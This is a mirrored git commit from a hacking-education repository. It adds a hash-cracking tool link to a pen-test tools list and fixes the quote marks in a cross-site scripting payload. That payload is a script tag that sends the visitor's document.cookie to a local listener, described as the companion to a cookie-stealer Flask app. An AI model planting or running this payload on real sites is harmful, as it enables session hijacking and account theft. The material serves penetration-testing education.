mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-22 02:43:02 +00:00
Merge branch 'master' of https://github.com/The-Art-of-Hacking/h4cker
This commit is contained in:
commit
149aa8d305
2 changed files with 3 additions and 2 deletions
|
@ -2,6 +2,7 @@
|
|||
The following are a collection of recently-released pen test tools. I update this list every time that there is a new post and when I find a new one around the Internet. The rest of the repository has hundreds of additional cybersecurity and pen test tools.
|
||||
|
||||
----
|
||||
- [Search-That-Hash - Searches Hash APIs To Crack Your Hash Quickly, If Hash Is Not Found Automatically Pipes Into HashCat](http://feedproxy.google.com/~r/PentestTools/~3/yodgPu0QuJI/search-that-hash-searches-hash-apis-to.html)
|
||||
- [Obfuscation_Detection - Collection Of Scripts To Pinpoint Obfuscated Code](http://feedproxy.google.com/~r/PentestTools/~3/UGycr92EPpQ/obfuscationdetection-collection-of.html)
|
||||
- [cve_manager_VS - A Collection Of Python Apps And Shell Scripts To Email An Xlsx Spreadsheet Of New Vulnerabilities In The NIST CVE Database And Their Associated Products On A Daily Schedule](http://feedproxy.google.com/~r/PentestTools/~3/AW1ePPa2tPE/cvemanagervs-collection-of-python-apps.html)
|
||||
- [Retoolkit - Reverse Engineer's Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/Yf4NMRTsBbg/retoolkit-reverse-engineers-toolkit.html)
|
||||
|
|
|
@ -2,5 +2,5 @@
|
|||
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
|
||||
|
||||
```
|
||||
<script type=“text/javascript”>document.location=“http://127.0.0.1:1337/?c=“+document.cookie;</script>
|
||||
```
|
||||
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue